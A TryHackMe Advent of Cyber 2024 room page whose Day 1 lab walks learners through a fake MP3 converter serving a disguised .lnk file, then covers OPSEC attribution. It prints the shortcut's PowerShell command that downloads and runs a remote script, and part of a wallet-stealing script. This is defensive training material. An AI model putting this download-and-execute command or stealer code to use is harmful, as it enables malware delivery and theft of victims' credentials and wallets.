data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="7" name="7" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="8" name="8" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="9" name="9" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="10" name="10" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>Text Content
You need to enable JavaScript to run this app.
* Learn
* Compete
* For Education
* For Business
* Pricing
Learn
Compete
For Education
For Business
Pricing
Log In
Join for FREE
Log In
Join for FREE
* Learn
* Advent of Cyber 2024
ADVENT OF CYBER 2024
Dive into the wonderful world of cyber security by engaging in festive
beginner-friendly exercises every day in the lead-up to Christmas!
easy
1440 min
Share the challengeHelp
6764
Room progress ( 0% )
To access material, start machines and answer questions login.
Advent of Cyber - Day 7: Detecting Malicious Behavior in AWS! •
Source: YouTube
Task 1Introduction Welcome to Advent of Cyber 2024
WELCOME TO ADVENT OF CYBER 2024!
In this year’s Advent of Cyber, can you help McSkidy and the Glitch defend
SOC-mas against the evil Mayor Malware’s plans?
Dive into the wonderful world of cyber security by engaging in festive
beginner-friendly exercises every day in the lead-up to Christmas!
Advent of Cyber is available to all TryHackMe users, and best of all, it's free
to participate in. You’ll also be in with the chance of winning from this year’s
huge $100,000 prize draw. The more questions you complete, the higher your
chances of winning BIG!
Think of it like an advent calendar, but with exciting (and festive) security
challenges instead of chocolate.
MAIN PRIZES
This year is our biggest and best prize draw yet, with over $100,000 worth of
prizes!
In this event, the number of questions you answer really matters! For each
question you answer correctly, you'll receive a raffle ticket. The more raffle
tickets you collect, the higher your chances of winning big!
To be in with the chance of winning the grand prize of DEF CON tickets with
accommodation, you’ll need to complete every task in this room by December 31st!
This will also earn you a certificate of completion.
Here are the prizes up for grabs:
15x Samsung Monitor ($300.00) 7x GRID Backpack ($225.00) 20x JBL Headphones
($130.00) 15x Branded Cotton Canvas Backpack ($65.00) 4x Sony Headphones
($450.00) 3x PAC-MAN™ Deluxe Arcade Game ($500.00) 5x Desk Chair ($249.00) 20x
Large Arlo Tech Organizer ($70.00) 20x The Sidekick Tech Kit ($50.00) 15x
Branded Apple AirPods Pro (2nd Gen) ($300.00) 10x Apple TV 4K 64GB (3rd
generation) ($149.00) 10x Personalized Catch:3 Classics, Italian Leather
($190.00) 15x Clutch® Pro USB-C for Android and iPhone 15+ ($50.00) 500x THM
Subscription (1 Month) ($14.00) 5x Stilosa 15 Bar Pump Espresso Machine
($150.00) 300x THM Subscription (3 Months) ($42.00) 5x Infinity Game Board™
($500.00) 25x THM Subscription (6 Months) ($84.00) 20x Branded MagSafe Charger
($45.00) 5x THM Subscription (12 Months) ($126.00) 5x Duo Standing Desk
($499.00) 400x TryHackMe Swag Gift Cards ($10.00) 10x Nintendo Switch 32GB Lite
($250.00) 300x TryHackMe Swag Gift Cards ($20.00) 3x Switch OLED Model w/ Neon
Red & Neon Blue Joy-Con ($420.00) 150x TryHackMe Swag Gift Cards ($50) ($50.00)
10x Solar Charger and Emergency Radio ($50.00) 80x TryHackMe Swag Gift Cards
($75) ($75.00) 2x PlayStation VR2 ($600.00) 20x TryHackMe Swag Gift Cards ($100)
($100.00) 5x Beosound Explore Outdoor Bluetooth Speaker ($249.00) 200x
Hacktivities Cards ($20.00) 10x Therabody SmartGoggles ($199.00) 5x DEF CON
($460.00) 10x Ornata V3 Full-Size Wired Mecha-Membrane Gaming Keyboard with
Chroma RGB Backlighting ($79.00) GRAND PRIZE: 3x DEF CON + Accommodation
($1,500.00)
All winners will be chosen at random, verified by our team (no cheating
allowed!), and announced on Monday, January 6th, 2025.
GENERAL RULES
Breaking any of the following rules will result in elimination from the event:
* .tryhackme.com and the OpenVPN server are off-limits to probing, scanning, or
exploiting
* Users are only authorised to hack machines deployed in the rooms they have
access to
* Users are not to target or attack other users
* Users should only enter the event once, using one account
* Answers to questions are not to be shared unless shown on videos/streams
* Cheating
* Usage of bot accounts
For the prize raffle terms and conditions, please visit this page.
Please note: Cheating is NOT allowed and will result in a disqualification from
the Advent of Cyber event. All winners will be fully verified. This includes, in
particular:
* creating puppet accounts to inflate your chance to win
* using bots to auto-complete the answers in the room
HOW TO QUALIFY
To qualify for the main prizes, you must answer questions in the Advent of Cyber
2024 challenges, starting with Day 1 (Task 7 of this room). Only questions
answered in the Advent of Cyber 2024 room will qualify you for the raffle.
* It doesn't matter when you complete tasks. You just need to complete them by
31st December 2024. For example, if you complete questions from Day 1 on 31st
December 2024, you will still receive the same amount of raffle tickets as a
user who completes on the day of the task release!
* You don't have to complete all the questions or complete them in order. The
more questions you answer, the more raffle tickets you get and the higher
your chances of winning.
* Please visit this page to read the detailed Raffle Terms and Conditions.
IMPORTANT NOTE: The raffle tickets will not be visible on your profile. The
number of raffle tickets you have always equals the number of questions you
answer in this room.
CERTIFICATE & BADGE
Finally, if you complete every task in the event, you will earn a certificate of
completion and a badge! As your name will be included on the certificate, we
advise ensuring your full name is set (and updated) in your profile.
FEATURED VIDEOS
Each task released has a supporting video walkthrough to guide you through. You
can expect to see some of your favourite cyber security video creators. The most
recent day’s video will display at the top of the room, but all videos will be
available within the relevant task content.
This year's Advent of Cyber featured creators include 0day, UnixGuy, Gerald
Auger, Tyler Ramsbey, Bearded I.T. Dad, Day Cyberwox, Marcus Hutchins, David
Alves, InsiderPHD, Tib3rius, KevTech, Cyb3rMaddy, and more!
Answer the questions below
I have read the rules and raffle Terms and Conditions.
Login to answer..
Task 2Introduction Join our community
JOIN OUR COMMUNITY
Follow us on social media for exclusive giveaways, Advent of Cyber task
releases, and our prize draw announcement!
Follow us on LinkedIn!
Be a part of our community and join our Discord!
Follow us on X to receive daily challenge posts!
Join us on Instagram!
Follow us on Facebook!
Join our growing subreddit!
Follow our TikToks!
JOIN OUR DISCORD
Discord is the heartbeat of the TryHackMe community. It's where we go to connect
with fellow hackers, get help with difficult rooms, and find out when a new room
launches. Our Discord server has over 220,000 members (and continues to grow
every day), so there's always something happening.
Are you excited about Advent of Cyber? Visit a dedicated channel on our Discord,
where you can chat with other participants in the event and follow the daily
releases!
If you haven't used it before, it's very easy to set up (we recommend installing
the app). We'll ask a couple of onboarding questions to help figure out which
channels are most relevant to you.
WHAT DO YOU GET WITH DISCORD?
There are so many benefits to joining:
* Discuss the day's Advent of Cyber challenges and receive support in a
dedicated channel.
* Discover how to improve your job applications and fast-track your way into a
cyber career.
* Learn about upcoming TryHackMe events and challenges.
* Browse discussion forums for all of our learning paths and releases.
Click on this link to join our Discord Server: Join the Community!
GRAB YOUR SWAG!
Want to rep swag from your favourite cyber security training platform? We have a
NEW special edition Advent of Cyber swag, now available for order!
Answer the questions below
Join our Discord and say hi!
Login to answer..
Is there a dedicated Advent of Cyber channel on TryHackMe Discord where users
can discuss daily challenges and receive dedicated support? (yes/no)
Login to answer..
Follow us on LinkedIn!
Login to answer..
Follow us on X!
Login to answer..
Check out the subreddit!
Login to answer..
Join us on Instagram!
Login to answer..
Follow us on Facebook!
Login to answer..
Follow our TikToks!
Login to answer..
Task 3Introduction Completing Advent of Cyber as an organisation
COMPLETING ADVENT OF CYBER AS AN ORGANISATION
With TryHackMe for Business, you:
* Get full unlimited access to all of TryHackMe's content and features
(excluding cloud content and SOC Sim)
* Leverage competitive learning and collectively engage your team in Advent of
Cyber tasks, measuring their progress
* Create customised learning paths to dive into training topics based on Advent
of Cyber and beyond
* Training for Defensive, Offensive, and Cloud Security teams
* Advanced admin reports and dashboards
* Implementation support for your organisation, SSO integration, and Customer
Success Manager
* Build your own custom capture-the-flag events on demand!
If you're interested in exploring TryHackMe's business benefits through a FREE
trial, please contact sales@tryhackme.com. For more information about our
offering, check out the business page.
If you’re an existing client and want to get your wider team and company
involved, please reach out to your dedicated Customer Success Manager!
Answer the questions below
Get your team to work on Advent of Cyber together!
Login to answer..
Task 4Introduction How to use TryHackMe
A SHORT TRYHACKME TUTORIAL
New tasks are released daily at 4pm GMT, with the first challenge being released
on 1st December. They will vary in difficulty (although they will always be
aimed at beginners). Each task in the event will include instructions on how to
interact with the practical material. Please follow them carefully! The
instructions will include a connection card similar to the one shown below:
Let's work our way through the different options.
If the AttackBox option is available:
TryHackMe's AttackBox is an Ubuntu Virtual Machine hosted in the cloud. Think of
the AttackBox as your virtual computer, which you would use to conduct a
security engagement. There will be multiple tasks during the event that will ask
you to deploy the AttackBox.
You can deploy the AttackBox by clicking the "Start AttackBox" button at the top
of this page.
Using the web-based AttackBox, you can complete exercises through your browser.
If you're a regular user, you can deploy the AttackBox for free for 1 hour a
day. If you're subscribed, you can deploy it for an unlimited amount of time!
Please note that you can use your own attacker machine instead of the AttackBox.
In that case, you will need to connect using OpenVPN. Instructions on how to set
up OpenVPN are here.
You can open the AttackBox full-screen view in a new tab using this button:
If the VM option is available:
Most tasks in Advent of Cyber will have a virtual machine attached to them. You
will use some of them as targets to train your offensive security skills and
some of them as hosts for your analysis and investigations. If this option is
available, you need to click the "Start Machine" button.
After the machine is deployed, you will see a frame appear at the top of the
room. It will display some important information, like the IP address of the
target machine, as well as options to extend the machine's timer or terminate
it.
If the split-screen option is available:
Some tasks will allow you to view your deployed VM in a split-screen view.
Typically, if this option is enabled, the split screen will open automatically.
If it doesn't, you can click this button at the top of the page for the split
screen to open.
Please note that you can open split-screen virtual machines in another tab using
this button:
If there's a direct link available:
Some virtual machines allow you to view the necessary content directly in
another tab on your browser. In this case, you'll be able to see a link to the
virtual machine directly in the task content.
Please note that for the link to work, you first need to deploy the virtual
machine attached to the task.
If there is a direct connection option available:
Some tasks will allow you to connect to the virtual machines attached using RDP,
SSH, or VNC. This is always optional, and virtual machines with this enabled
will also be accessible via a split screen. In these cases, login credentials
will be provided, like in the image below:
We provide this as some users might prefer to connect directly. However, please
note that some tasks will deliberately have this option disabled. If no
credentials are given, direct connection is not possible.
Answer the questions below
Got it!
Login to answer..
Task 5Introduction How the Glitch Stole SOC-mas
HOW THE GLITCH STOLE SOC-MAS
The snow is falling on the tech town of Wareville, and all the different Ware
families are gathering in the town square, getting ready for a town meeting. We
see the Softwares and the Freewares, skating down the neon-lit frostlanes. We
turn to Server Street, and see the Hardwares and the Firmwares marching
downtown, festive server lights blinking and flickering in their eyes. It’s time
to start preparing for SOC-mas, the most joyous time of the year in the tech
town of Wareville.
If we lift our eyes, we’ll see, beyond the buzzing city, a snow-covered mountain
of discarded technology. Boulders of old printers, cracked monitor cliffs, and
server rack ridges, held together by vines of ethernet cables, and a single old
gaming chair at the peak - this is Mount Hackit, and no Wares dare to go there.
They fear it not because of the frequent floppy disk avalanches, the Wares avoid
Mount Hackit because of the Glitch.
The Glitch’s lair is hidden in a deep cave, and he’s there now. He grabs a few
cables hanging from the ceiling and plugs them in. Although not as new and shiny
as Wareville’s, his servers work just fine! The Glitch has been watching
Wareville’s security for years, and this SOC-mas will not be different. The
Wares might fear the Glitch, thinking he is an evil hacker, but it doesn’t
matter. Cracking his fingers, he starts typing, establishing the connection to
the town’s network. Time to hack!
Back in the town square, Marta May Ware, the SOC-mas organiser, is climbing up
on the stage to address the town when all the lights suddenly flicker. All the
Wares look around, confused, but it passes quickly, and everything returns to
normal.
In the city hall, Mayor Malware slams his fists on his desk. “Blocked again!” he
shouts angrily. “That insufferable Glitch is at it again!” The mayor’s plan to
stop SOC-mas preparation by sabotaging tonight's meeting was unsuccessful. He’ll
have to think of something better for tomorrow…
In the meantime, Wareville’s SOC is in chaos. Analysts are trying to discover
what caused the sudden power surge that threatened all tech in the town. McSkidy
Software, the town’s leading cyber security expert, points at a log file on the
screen and exclaims, “Now, I don’t know exactly what happened, but this proves
we had a connection from Mount Hackit!” McSkidy runs out of the SOC and heads up
the mountain. When she reaches the cave, she does not expect to see the Glitch
waiting for her, two cups of hot cocoa in his hands, and his dog curled up at
his feet.
It takes most of the evening, but the Glitch explains what he’s been doing:
protecting the town from Mayor Malware’s evil plans. It looks like the mayor
wants to completely stop SOC-mas from happening this year! The Glitch knows the
Wares might mistrust or hate him, but he wants to help.
Now, united by a common purpose, McSkidy and the Glitch start their work in the
Mount Hackit cave, because they’re the only ones standing between Wareville and
chaos.
Come back on December 1st to help McSkidy and the Glitch defend SOC-mas against
the evil Mayor Malware’s plans!
Answer the questions below
Sounds serious! I will be here to help the Glitch on December 1st!
Login to answer..
Task 6Introduction Subscribe to TryHackMe with a 30% discount!
SUBSCRIBE WITH A DISCOUNT!
The Advent of Cyber event is completely free! However, we recommend checking out
some of the reasons to subscribe:
To celebrate Advent of Cyber, you can get 30% off personal annual subscriptions
using the discount code AOC2024 at checkout. This discount is valid until 31st
December, 2024, at 23:59 GMT – that's in:
Answer the questions below
Share the discount with your friends!
Login to answer..
Task 7 OPSEC Day 1: Maybe SOC-mas music, he thought, doesn't come from a store?
Task includes a deployable machine
The Story
McSkidy tapped keys with a confident grin,
A suspicious website, now where to begin?
She'd seen sites like this, full of code and of grime,
Shady domains, and breadcrumbs easy to find.
Click here to watch the walkthrough video!
McSkidy's fingers flew across the keyboard, her eyes narrowing at the suspicious
website on her screen. She had seen dozens of malware campaigns like this. This
time, the trail led straight to someone who went by the name "Glitch."
"Too easy," she muttered with a smirk.
"I still have time," she said, leaning closer to the screen. "Maybe there's
more."
Little did she know, beneath the surface lay something far more complex than a
simple hacker's handle. This was just the beginning of a tangled web unravelling
everything she thought she knew.
LEARNING OBJECTIVES
* Learn how to investigate malicious link files.
* Learn about OPSEC and OPSEC mistakes.
* Understand how to track and attribute digital identities in cyber
investigations.
CONNECTING TO THE MACHINE
Before moving forward, review the questions in the connection card shown below
and start the virtual machine by pressing the Start Machine button. The VM
should be fully loaded in 3 minutes. Additionally, you will need the AttackBox,
which can be launched by clicking the Start AttackBox button at the top of the
page.
Start Machine
NOTE:
If you’re clicking "Start Machine" and encountering an issue launching it, don’t
worry—it’s just the high demand. What can you do?
* Keep trying! Machines are becoming available as demand fluctuates.
* If you’re still having trouble, come back a little later when it’s less busy.
INVESTIGATING THE WEBSITE
The website we are investigating is a Youtube to MP3 converter currently being
shared amongst the organizers of SOC-mas. You've decided to dig deeper after
hearing some concerning reports about this website.
From your AttackBox, access the website by visiting MACHINE_IP using the web
browser.
At first glance, the website looks legit and presentable. The About Page even
says that it was made by "The Glitch ". How considerate of them to make our job
easier!
Scrolling down, you'll see the feature list, which promises to be "Secure" and
"Safe." From our experience, that isn't very likely.
YOUTUBE TO MP3 CONVERTER WEBSITES
These websites have been around for a long time. They offer a convenient way to
extract audio from YouTube videos, making them popular. However, historically,
these websites have been observed to have significant risks, such as:
* Malvertising: Many sites contain malicious ads that can exploit
vulnerabilities in a user's system, which could lead to infection.
* Phishing scams: Users can be tricked into providing personal or sensitive
information via fake surveys or offers.
* Bundled malware: Some converters may come with malware, tricking users into
unknowingly running it.
What nefarious thing does this website have in store for us?
GETTING SOME TUNES
Let's find out by pasting any YouTube link in the search form and pressing the
"Convert" button. Then select either mp3 or mp4 option. This should download a
file that we could use to investigate. For example, we can use
https://www.youtube.com/watch?v=dQw4w9WgXcQ, a classic if you ask me.
Once downloaded, navigate to your Downloads folder or if you are using the
AttackBox, to your /root/ directory. Locate the file named download.zip,
right-click on it, and select Extract To. In the dialog window, click the
Extract button to complete the extraction.
You'll now see two extracted two files: song.mp3 and somg.mp3.
To quickly determine the file's contents, double-click on the "Terminal" icon on
the desktop then run the file command on each one. First, let's try checking
song.mp3.
Check File 1 Terminal
user@tryhackme:~$ file song.mp3
download.mp3: Audio file with ID3 version 2.3.0, contains:MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo
There doesn't seem to be anything suspicious, according to the output. As
expected, this is just an MP3 file.
How about the second file somg.mp3? From the filename alone, we can tell
something is not right. Still, let's confirm by running the file command on it
anyway.
Check File 2 Terminal
user@tryhackme:~$ file somg.mp3
somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Sat Sep 15 07:14:14 2018, mtime=Sat Sep 15 07:14:14 2018, atime=Sat Sep 15 07:14:14 2018, length=448000, window=hide
Now, this is more interesting!
The output tells us that instead of an MP3, the file is an "MS Windows
shortcut", also known as a .lnk file. This file type is used in Windows to link
to another file, folder, or application. These shortcuts can also be used to run
commands! If you've ever seen the shortcuts on a Windows desktop, you already
know what they are.
There are multiple ways to inspect .lnk files to reveal the embedded commands
and attributes. For this room, however, we'll use ExifTool, which is already
installed on this machine.
To do this, go back to your Terminal and type:
Using Exiftool Terminal
user@tryhackme:~$ exiftool somg.mp3
Look through the output to locate the command used as a shortcut in the somg.mp3
file. If you scroll down through the output, you should see a PowerShell
command.
Using Exiftool Terminal
...
Relative Path : ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Working Directory : C:\Windows\System32\WindowsPowerShell\v1.0
Command Line Arguments : -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\ProgramData\s.ps1'); iex (Get-Content 'C:\ProgramData\s.ps1' -Raw)"
Machine ID : win-base-2019
user@tryhackme:~#
What this PowerShell command does:
* The -ep Bypass -nop flags disable PowerShell's usual restrictions, allowing
scripts to run without interference from security settings or user profiles.
* The DownloadFile method pulls a file (in this case, IS.ps1) from a remote
server
(https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1)
and saves it in the C:\\ProgramData\\ directory on the target machine.
* Once downloaded, the script is executed with PowerShell using the iex
command, which triggers the downloaded s.ps1 file.
If you visit the contents of the file to be downloaded using your browser
(https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1),
you will see just how lucky we are that we are not currently using Windows.
PowerShell Script Terminal
function Print-AsciiArt {
Write-Host " ____ _ ___ _____ ___ _ _ "
Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
Write-Host "| | _ | | | | | | | | | |_| |"
Write-Host "| |_| | | |___ | | | | | |__ | _ |"
Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
Write-Host " Created by the one and only M.M."
}
# Call the function to print the ASCII art
Print-AsciiArt
# Path for the info file
$infoFilePath = "stolen_info.txt"
# Function to search for wallet files
function Search-ForWallets {
$walletPaths = @(
"$env:USERPROFILE\.bitcoin\wallet.dat",
"$env:USERPROFILE\.ethereum\keystore\*",
"$env:USERPROFILE\.monero\wallet",
"$env:USERPROFILE\.dogecoin\wallet.dat"
)
Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
foreach ($path in $walletPaths) {
if (Test-Path $path) {
Add-Content -Path $infoFilePath -Value "Found wallet: $path"
}
}
}
[Output truncated for brevity]
The script is designed to collect highly sensitive information from the victim's
system, such as cryptocurrency wallets and saved browser credentials, and send
it to an attacker's remote server.
Disclaimer: All content in this room, including CPP code, PowerShell scripts,
and commands, is provided solely for educational purposes. Please do not execute
these on a Windows host.
This looks fairly typical of a PowerShell script for such a purpose, with one
notable exception: a signature in the code that reads.
> Created by the one and only M.M.
SEARCHING THE SOURCE
There are many paths we could take to continue our investigation. We could
investigate the website further, analyse its source code, or search for open
directories that might reveal more information about the malicious actor's
setup. We can search for the hash or signature on public malware databases like
VirusTotal or Any.Run. Each of these methods could yield useful clues.
However, for this room, we'll try something a bit different. Since we already
have the PowerShell code, searching for it online might give us useful leads.
It's a long shot, but we'll explore it in this exercise.
There are many places where we can search for code. The most widely used is
Github. So let's try searching there.
To search effectively, we can look for unique parts of the code that we could
use to search with. The more distinctive, the better. For this scenario, we have
the string we've uncovered before that reads:
"Created by the one and only M.M."
Search for this on Github.com or by going directly to this
link: https://github.com/search?q=%22Created+by+the+one+and+only+M.M.%22&type=issues
You'll notice something interesting if you explore the pages in the search
results.
NOTE!
If you receive an error below, it's because Github has rate limits in place if
you are not signed in. To fix this, you can just sign in with a GitHub account
or skip directly to the next step by going here:
https://github.com/Bloatware-WarevilleTHM/CryptoWallet-Search/issues/1
If you look through the search results, you can be able infer the malicious
actor's identity based on information on the project's page and the GitHub
Issues section.
Aha! Looks like this user has made a critical mistake.
INTRODUCTION TO OPSEC
This is a classic case of OPSEC failure.
Operational Security (OPSEC) is a term originally coined in the military to
refer to the process of protecting sensitive information and operations from
adversaries. The goal is to identify and eliminate potential vulnerabilities
before the attacker can learn their identity.
In the context of cyber security, when malicious actors fail to follow proper
OPSEC practices, they might leave digital traces that can be pieced together to
reveal their identity. Some common OPSEC mistakes include:
* Reusing usernames, email addresses, or account handles across multiple
platforms. One might assume that anyone trying to cover their tracks would
remove such obvious and incriminating information, but sometimes, it's due to
vanity or simply forgetfulness.
* Using identifiable metadata in code, documents, or images, which may reveal
personal information like device names, GPS coordinates, or timestamps.
* Posting publicly on forums or GitHub (Like in this current scenario) with
details that tie back to their real identity or reveal their location or
habits.
* Failing to use a VPN or proxy while conducting malicious activities allows
law enforcement to track their real IP address.
You'd think that someone doing something bad would make OPSEC their top
priority, but they're only human and can make mistakes, too.
For example, here are some real-world OPSEC mistakes that led to some really big
fails:
ALPHABAY ADMIN TAKEDOWN
One of the most spectacular OPSEC failures involved Alexandre Cazes, the
administrator of AlphaBay, one of the largest dark web marketplaces:
* Cazes used the email address "pimp_alex_91@hotmail.com" in early welcome
emails from the site.
* This email included his year of birth and other identifying information.
* He cashed out using a Bitcoin account tied to his real name.
* Cazes reused the username "Alpha02" across multiple platforms, linking his
dark web identity to forum posts under his real name.
CHINESE MILITARY HACKING GROUP (APT1)
There's also the notorious Chinese hacking group APT1, which made several OPSEC
blunders:
* One member, Wang Dong, signed his malware code with the nickname "Ugly
Gorilla".
* This nickname was linked to programming forum posts associated with his real
name.
* The group used predictable naming conventions for users, code, and passwords.
* Their activity consistently aligned with Beijing business hours, making their
location obvious.
These failures provided enough information for cyber security researchers and
law enforcement to publicly identify group members.
UNCOVERING MM
If you've thoroughly investigated the GitHub search result, you should have
uncovered several clues based on poor OPSEC practices by the malicious actor.
We know the attacker left a distinctive signature in the PowerShell code (MM).
This allowed us to search for related repositories and issues pages on GitHub.
We then discovered an Issues page where the attacker engaged in discussions,
providing more context and linking their activity to other projects.
In this discussion, they responded to a query about modifying the code. This
response, paired with their unique handle, was another critical slip-up, leaving
behind a trail of evidence that can be traced back to them. By analysing the
timestamps, usernames, and the nature of their interactions, we can now
attribute the mastermind behind the attack to MM.
WHAT'S NEXT?
McSkidy dug deeper, her mind sharp and quick,
But something felt off, a peculiar trick.
The pieces she’d gathered just didn’t align,
A puzzle with gaps, a tangled design.
As McSkidy continued digging, a pattern emerged that didn't fit the persona she
was piecing together. A different handle appeared in obscure places, buried deep
in the details: "MM."
"Who's MM?" McSkidy muttered, the mystery deepening.
Even though all signs on the website seemed to point to Glitch as the author, it
became clear that someone had gone to great lengths to ensure Glitch's name
appeared everywhere. Yet, the scattered traces left by MM suggested a deliberate
effort to shift the blame.
Answer the questions below
